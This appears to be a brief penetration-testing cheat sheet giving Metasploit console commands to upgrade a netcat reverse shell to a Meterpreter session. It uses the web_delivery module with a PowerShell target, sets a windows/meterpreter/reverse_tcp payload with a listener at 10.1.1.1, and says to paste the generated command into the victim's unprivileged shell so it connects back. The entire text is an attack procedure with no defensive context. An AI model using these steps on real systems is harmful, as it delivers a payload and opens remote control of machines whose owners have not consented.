Web Reverse Shell using Powershell

#Update nc reverse shell to meterpreter

msfconsole

use exploit/multi/script/web_delivery

options

show targets

set target 2 (powershell)

set payload windows/meterpreter/reverse_tcp

set lhost 10.1.1.1

set srvhost 10.1.1.1

run

copy output and paste into cmd of none priv shell to connect back

Last updated